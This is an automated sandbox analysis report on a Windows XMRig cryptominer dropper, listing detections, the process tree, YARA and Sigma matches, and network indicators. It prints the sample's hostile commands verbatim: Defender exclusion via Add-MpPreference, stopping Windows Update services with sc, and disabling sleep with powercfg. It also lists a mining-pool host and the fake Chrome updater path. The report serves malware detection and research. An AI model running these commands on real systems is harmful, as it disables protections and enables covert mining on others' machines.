Edit tour

Windows Analysis Report
hiwA7Blv7C.exe

Overview

General Information

Sample name:	hiwA7Blv7C.exe renamed because original name is a hash value
Original sample name:	882b403dcc4c6928de9d4a86bf4fbb650909485e828cba37258d68be81340739.exe
Analysis ID:	1583518
MD5:	7bf019893eb8df6fc169e8f9ef5269c6
SHA1:	41fcc57f71768d9df534632d3d7c52138d59e3e1
SHA256:	882b403dcc4c6928de9d4a86bf4fbb650909485e828cba37258d68be81340739
Tags:	exeuser-JaffaCakes118
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Stop multiple services

Suricata IDS alerts for network traffic

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Connects to a pastebin service (likely for C&C)

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

DNS related to crypt mining pools

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Found strings related to Crypto-Mining

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Installs new ROOT certificates

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies power options to not sleep / hibernate

Modifies the context of a thread in another process (thread injection)

Modifies the hosts file

Modifies the prolog of user mode functions (user mode inline hooks)

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Stops critical windows services

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses powercfg.exe to modify the power settings

Writes to foreign memory regions

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

hiwA7Blv7C.exe (PID: 1908 cmdline: "C:\Users\user\Desktop\hiwA7Blv7C.exe" MD5: 7BF019893EB8DF6FC169E8F9EF5269C6)

dialer.exe (PID: 2120 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

winlogon.exe (PID: 560 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

lsass.exe (PID: 652 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 996 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

powershell.exe (PID: 2536 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3940 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 6484 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 2616 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 3960 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 4256 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 5360 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 3520 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 6532 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 5340 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 6920 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 6840 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

updater.exe (PID: 6556 cmdline: "C:\Program Files\Google\Chrome\updater.exe" MD5: 7BF019893EB8DF6FC169E8F9EF5269C6)

dialer.exe (PID: 6064 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

svchost.exe (PID: 436 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 376 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 60 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 980 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1140 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dialer.exe (PID: 1060 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

dialer.exe (PID: 5536 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

powershell.exe (PID: 3512 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1352 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5268 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 4176 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 3796 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 4136 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 7164 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 1444 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 2192 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 3552 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 2812 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 2084 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\Temp\bzqlyietdwsj.tmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Windows\Temp\bzqlyietdwsj.tmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4e4b68:$a1: mining.set_target 0x4e03c8:$a2: XMRIG_HOSTNAME 0x4e1ed0:$a3: Usage: xmrig [OPTIONS] 0x4e03a0:$a4: XMRIG_VERSION
C:\Windows\Temp\bzqlyietdwsj.tmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4eac21:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\Windows\Temp\bzqlyietdwsj.tmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4eb1e0:$s1: %s/%s (Windows NT %lu.%lu 0x4eba40:$s3: \\.\WinRing0_ 0x4e4178:$s4: pool_wallet 0x4446e0:$s5: cryptonight 0x4446f0:$s5: cryptonight 0x444700:$s5: cryptonight 0x444710:$s5: cryptonight 0x444728:$s5: cryptonight 0x444738:$s5: cryptonight 0x444748:$s5: cryptonight 0x444760:$s5: cryptonight 0x444770:$s5: cryptonight 0x444788:$s5: cryptonight 0x4447a0:$s5: cryptonight 0x4447b0:$s5: cryptonight 0x4447c0:$s5: cryptonight 0x4447d0:$s5: cryptonight 0x4447e8:$s5: cryptonight 0x444800:$s5: cryptonight 0x444810:$s5: cryptonight 0x444820:$s5: cryptonight

Memory Dumps

Source	Rule	Description	Author	Strings
00000034.00000003.2193166407.000001888CD4B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000034.00000002.3320602236.000001888CCD8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000034.00000002.3320602236.000001888CCB1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000034.00000003.2193071885.000001888D285000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000034.00000003.2193071885.000001888D28F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000034.00000002.3320602236.000001888CD3F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000034.00000002.3320602236.000001888CD31000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x51fda8:$a1: mining.set_target 0x51b608:$a2: XMRIG_HOSTNAME 0x51d110:$a3: Usage: xmrig [OPTIONS] 0x51b5e0:$a4: XMRIG_VERSION
Process Memory Space: dialer.exe PID: 1060	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: dialer.exe PID: 1060	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x8f486:$a1: mining.set_target 0x8c0fa:$a2: XMRIG_HOSTNAME 0x8ccac:$a3: Usage: xmrig [OPTIONS] 0x8c0db:$a4: XMRIG_VERSION
Process Memory Space: dialer.exe PID: 5536	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
47.2.dialer.exe.246fae5cc20.0.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
47.2.dialer.exe.246fae5cc20.0.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4f3188:$a1: mining.set_target 0x4ee9e8:$a2: XMRIG_HOSTNAME 0x4f04f0:$a3: Usage: xmrig [OPTIONS] 0x4ee9c0:$a4: XMRIG_VERSION
47.2.dialer.exe.246fae5cc20.0.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4f9241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
47.2.dialer.exe.246fae5cc20.0.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4f9800:$s1: %s/%s (Windows NT %lu.%lu 0x4fa060:$s3: \\.\WinRing0_ 0x4f2798:$s4: pool_wallet 0x452d00:$s5: cryptonight 0x452d10:$s5: cryptonight 0x452d20:$s5: cryptonight 0x452d30:$s5: cryptonight 0x452d48:$s5: cryptonight 0x452d58:$s5: cryptonight 0x452d68:$s5: cryptonight 0x452d80:$s5: cryptonight 0x452d90:$s5: cryptonight 0x452da8:$s5: cryptonight 0x452dc0:$s5: cryptonight 0x452dd0:$s5: cryptonight 0x452de0:$s5: cryptonight 0x452df0:$s5: cryptonight 0x452e08:$s5: cryptonight 0x452e20:$s5: cryptonight 0x452e30:$s5: cryptonight 0x452e40:$s5: cryptonight
47.2.dialer.exe.246fae38c60.2.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
47.2.dialer.exe.246fae38c60.2.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x517148:$a1: mining.set_target 0x5129a8:$a2: XMRIG_HOSTNAME 0x5144b0:$a3: Usage: xmrig [OPTIONS] 0x512980:$a4: XMRIG_VERSION
47.2.dialer.exe.246fae38c60.2.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x51d201:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
47.2.dialer.exe.246fae38c60.2.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x51d7c0:$s1: %s/%s (Windows NT %lu.%lu 0x51e020:$s3: \\.\WinRing0_ 0x516758:$s4: pool_wallet 0x476cc0:$s5: cryptonight 0x476cd0:$s5: cryptonight 0x476ce0:$s5: cryptonight 0x476cf0:$s5: cryptonight 0x476d08:$s5: cryptonight 0x476d18:$s5: cryptonight 0x476d28:$s5: cryptonight 0x476d40:$s5: cryptonight 0x476d50:$s5: cryptonight 0x476d68:$s5: cryptonight 0x476d80:$s5: cryptonight 0x476d90:$s5: cryptonight 0x476da0:$s5: cryptonight 0x476db0:$s5: cryptonight 0x476dc8:$s5: cryptonight 0x476de0:$s5: cryptonight 0x476df0:$s5: cryptonight 0x476e00:$s5: cryptonight
47.2.dialer.exe.246fae35400.1.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
47.2.dialer.exe.246fae35400.1.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x51a9a8:$a1: mining.set_target 0x516208:$a2: XMRIG_HOSTNAME 0x517d10:$a3: Usage: xmrig [OPTIONS] 0x5161e0:$a4: XMRIG_VERSION
47.2.dialer.exe.246fae35400.1.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x520a61:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
47.2.dialer.exe.246fae35400.1.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x521020:$s1: %s/%s (Windows NT %lu.%lu 0x521880:$s3: \\.\WinRing0_ 0x519fb8:$s4: pool_wallet 0x47a520:$s5: cryptonight 0x47a530:$s5: cryptonight 0x47a540:$s5: cryptonight 0x47a550:$s5: cryptonight 0x47a568:$s5: cryptonight 0x47a578:$s5: cryptonight 0x47a588:$s5: cryptonight 0x47a5a0:$s5: cryptonight 0x47a5b0:$s5: cryptonight 0x47a5c8:$s5: cryptonight 0x47a5e0:$s5: cryptonight 0x47a5f0:$s5: cryptonight 0x47a600:$s5: cryptonight 0x47a610:$s5: cryptonight 0x47a628:$s5: cryptonight 0x47a640:$s5: cryptonight 0x47a650:$s5: cryptonight 0x47a660:$s5: cryptonight
Click to see the 7 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 3940, ProcessName: cmd.exe

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 2536, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 2120, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 928, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 2536, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE SilentCryptoMiner Agent Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T23:26:04.974237+0100	2054247	1	A Network Trojan was detected	172.67.19.24	443	192.168.2.6	49701	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: hiwA7Blv7C.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmp	Avira: detection malicious, Label: RKIT/Agent.dvyic
Source: C:\Program Files\Google\Chrome\updater.exe	Avira: detection malicious, Label: TR/Rozena.qmghx

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmp	ReversingLabs: Detection: 86%
Source: C:\Windows\Temp\bzqlyietdwsj.tmp	ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

Source: hiwA7Blv7C.exe

ReversingLabs: Detection: 60%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmp	Joe Sandbox ML: detected
Source: C:\Windows\Temp\bzqlyietdwsj.tmp	Joe Sandbox ML: detected
Source: C:\Program Files\Google\Chrome\updater.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: hiwA7Blv7C.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 47.2.dialer.exe.246fae5cc20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 47.2.dialer.exe.246fae38c60.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 47.2.dialer.exe.246fae35400.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000034.00000003.2193166407.000001888CD4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.3323630620.000001888D250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.3320602236.000001888CCD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.3320602236.000001888CCB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.3320602236.000001888CC96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000003.2193071885.000001888D285000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000003.2193071885.000001888D28F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.3320602236.000001888CD3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.3320602236.000001888CD31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dialer.exe PID: 1060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dialer.exe PID: 5536, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Temp\bzqlyietdwsj.tmp, type: DROPPED

DNS related to crypt mining pools

Source: unknown

DNS query: name: xmr-eu1.nanopool.org

Found strings related to Crypto-Mining

Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]

Source: hiwA7Blv7C.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D0165EDCE0 FindFirstFileExW,	23_2_000002D0165EDCE0
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F151DCE0 FindFirstFileExW,	27_2_000002D6F151DCE0
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F157DCE0 FindFirstFileExW,	27_2_000002D6F157DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000014E41FDDCE0 FindFirstFileExW,	30_2_0000014E41FDDCE0
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_000001D15B08DCE0 FindFirstFileExW,	31_2_000001D15B08DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023AF32EDCE0 FindFirstFileExW,	46_2_0000023AF32EDCE0
Source: C:\Windows\System32\svchost.exe	Code function: 50_2_0000023C9FD9DCE0 FindFirstFileExW,	50_2_0000023C9FD9DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_000001A1CA71DCE0 FindFirstFileExW,	51_2_000001A1CA71DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 53_2_00000246EDE6DCE0 FindFirstFileExW,	53_2_00000246EDE6DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 54_2_00000200A19BDCE0 FindFirstFileExW,	54_2_00000200A19BDCE0
Source: C:\Windows\System32\svchost.exe	Code function: 55_2_000002259668DCE0 FindFirstFileExW,	55_2_000002259668DCE0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

